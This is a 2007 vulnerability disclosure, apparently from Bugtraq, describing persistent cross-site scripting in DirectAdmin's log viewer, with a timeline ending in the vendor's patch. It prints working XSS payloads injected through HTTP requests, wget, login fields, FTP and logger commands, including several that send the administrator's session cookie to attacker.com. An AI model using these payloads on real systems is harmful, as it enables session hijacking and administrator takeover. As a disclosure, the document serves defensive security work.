+ DirectAdmin Description:
DirectAdmin is a popular, advanced Web Control Panel with many features for webhosting. www.directadmin.com
+ Persistant XSS Description:
It is possible to take over an Administrator`s account by injecting persistent XSS data to the System Logs [/var/log/*].
When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press "Show log" to display logs - he can be a victim of XSS attack and his session can be easily taken over - which means that it is possible to run any command with DirectAdmin's Administrator priviliges.
I found out that 7 from 15 log files in the menu, could be used as means of injecting XSS to a system with no login credentials required.
Next 3 of them are possible to be injected when you are logged as a valid user in the DirectAdmin.
I was testing DirectAdmin on default Debian 4.0 installation but in general it should be working for other platforms too (with small changes I guess).
Details:
I) Examples of an attack without login credentials:
Data is sent to IP with DirectAdmin to port 80:
GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123] request failed: erroneous characters after protocol string: GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>
4) Log file: /var/log/httpd/access_Log
Data is sent to "free (not attached to any user)" IP to port 80 (using wget):
wget IP --user-agent="</textarea><script>alert('0wned:'+escape(document.cookie));</script>"
Data is sent to first DirectAdmin login page:
login: </textarea><script>alert('0wned:'+escape(document.cookie));</script>
password: any (not empty)
Lines in log files:
error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info for </textarea><script>alert('0wned:'+escape(document.cookie));</script>
6) Log file: /var/log/directadmin/security.log
Data is sent to first DirectAdmin login page:
login: </textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login with an invalid username: '</textarea><script>alert('0wned:'+escape(document.cookie));</script>' ***
II) Examples of an attack with login credentials:
1) Log file: /var/log/directadmin/security.log
Via WWW: http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.com</textarea><script>alert('XSS');</script>
Via ftp login: lftp login@directadmin:/> get "</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"
2) Log file: /var/log/messages
via php: <?php system('/usr/bin/logger "</textarea><script>location.href=\'http://attacker.com/xss.php?cook=\'+escape(document.cookie)</script>"'); ?>
3) Log file: /var/log/messages
via ssh: /usr/bin/logger "</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"
Timeline:
2007.02.25 bug discovered
2007.03.00 bug tested
2007.03.23 bug sent via Technical Support mail from http://www.directadmin.com/support.html
2007.03.24 fast response after few hours from DirectAdmin : Thanks for the report. Fix will be out within a few hours with DA 1.29.3
2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for log viewer, Description: Ensure all charcters are html encoded when viewing logs through the log viewer.
2007.04.01 posted to Bugtraq
